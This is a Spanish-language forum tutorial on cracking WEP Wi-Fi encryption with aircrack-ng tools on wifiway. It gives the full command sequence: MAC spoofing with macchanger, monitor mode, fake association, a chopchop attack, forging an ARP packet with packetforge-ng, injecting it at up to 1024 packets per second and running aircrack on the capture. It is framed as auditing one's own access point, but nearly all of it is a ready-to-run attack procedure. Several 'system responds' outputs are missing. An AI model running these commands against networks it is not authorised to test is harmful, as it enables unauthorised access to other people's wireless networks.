Buenas,
Lo poco que se de auditoria lo he aprendido en este foro. Si puedo quitar algo de trabajo a los que lo hacen posible , me daré por satisfecho. Gracias por vuestra paciencia

El tuto está hecho con wifiway 1.0, pero puede servir cualquier versión de wifislax.
Puntualizar que el chop-chop no siempre funciona, pero al forjar nosotros el arp, la inyección es inmediata.
Al lio:
Los drivers de inyección de la bosslan/alfa ya vienen cargados.
Abrimos una consola y tecleamos:
#iwconfig

Copiamos nuestra iface, en este caso wlan0. Vamos a cambiarle la mac:
#macchanger -m 00:01:02:03:04:05 wlan0
El sistema responde:

Ponemos la tarjeta en modo monitor:
#airmon-ng start wlan0
El sistema responde:

Tenemos todo a punto, lanzamos el airodump para ver nuestro AP.
Tecleamos:
#airodump-ng wlan0
Veremos una lista de los AP:

Cuando veamos nuestro AP en la lista pulsamos Ctrl + c, se nos parará el airodump, nos fijaremos en el BSSID (MAC de nuestro AP), el canal y el ESSID (nombre de nuestro AP).
Ahora volveremos a abrir el airodump con las opciones: -c (para filtrar por canal), la opción -b (filtrar por BSSID) y la opción -w para que nos cree un archivo donde se nos guardarán los ivs. El nombre del archivo puede ser cualquiera.
#airodump-ng -c [nº_canal] -b [bssid] -w [nombre_archivo] [iface]
En nuestro caso:
#airodump-ng -c 9 -b 00:02:CF:XX:XX:XX -w captura wlan0
El sistema responde:

Lo dejamos abierto, abrimos otra consola para asociarnos al AP, ataque 1 ó asociación falsa:
#aireplay-ng -1 10 -a [bssid] -h [mac_nuestra_tarjeta] [iface]
Nuestro ejemplo:
#aireplay-ng -1 10 -a 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 wlan0
Si todo va bien, tenemos que ver esto:

Una vez asociados, dejamos la consola abierta y abrimos otra donde lanzaremos el ataque 4 (chopchop), para conseguir un paquete de datos WEP:
#aireplay-ng -4 -h [mac_nuestra_tarjeta] [iface]
Sigamos con nuestro ejemplo:
#aireplay-ng -4 -h 00:01:02:03:04:05 wlan0
Puede tardar más o menos pero nos tiene que salir algo así:

Nos pregunta si queremos utilizar este paquete, le decimos que y.

Nos ha creado dos archivos, uno .cap y otro .xor.
Abriremos el .cap con el tcpdump para ver la ip de nuestro AP.
#tcpdump -s 0 -n -e -r [archivo.cap]
En nuestro caso:
#tcpdump -s 0 -n -e -r replay_dec-1117-143113.cap
Nos responde:

Vemos la ip del AP: 192.168.1.1 (el 520 no se lo que es), pero siempre serán los cuatro primeros números.
Ahora con el packetforge vamos a forjar un arp para poder inyectarlo:
#packetforge-ng -0 -a [bssid] -h [mac_nuestra_tarjeta] -k [ip_origen] -l [ip_destino] -y [archivo.xor] -w [nombre_arp_que_creamos]
La ip de origen puede ser cualquiera dentro del rango, la de destino tiene que ser la del AP, y -w sera el arp, ponemos cualquier nombre.En nuestro caso:
#packetforge-ng -0 -a 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 -k 192.168.1.255 -l 192.168.1.1 -y replay_dec-1117-143113.xor -w arp

Wrote packet to: arp, ya tenemos nuestro arp.
Ahora vamos a inyectarlo con aireplay-ng -2:
#aireplay-ng -2 -h [mac_nuestra_tarjeta] -r [archivo_arp] [iface]
Nosotros le añadimos la opción -x 1024, para que inyecte 1024 paquetes por segundo, por defecto son 600 (creo). Algunos AP se saturan al inyectar a 1024, o pude que incluso se bloqueen con la opción por defecto, (600), si vemos que al lanzar el A2 empieza a inyectar, y se para a los pocos segundos, relanzaremos el A2 añadiendo la opción -x 300.
#aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r arp wlan0

Le respondemos que y , y si nada ha fallado ya estamos inyectando.
Nos vamos al airodump y lo comprobamos:

Solo nos queda esperar que suban los #data y lanzar el aircrack. A diferencia del A3, aquí no nos suben los arp, por tanto el ptw no nos sirve. necesitaremos más #data. Sin cerrar nada, abrimos otra consola y lanzamos el aircrack:
#aircrack [archivo_captura]-01.cap
Nosotros:
#aircrack captura-01.cap

Suerte y paciencia...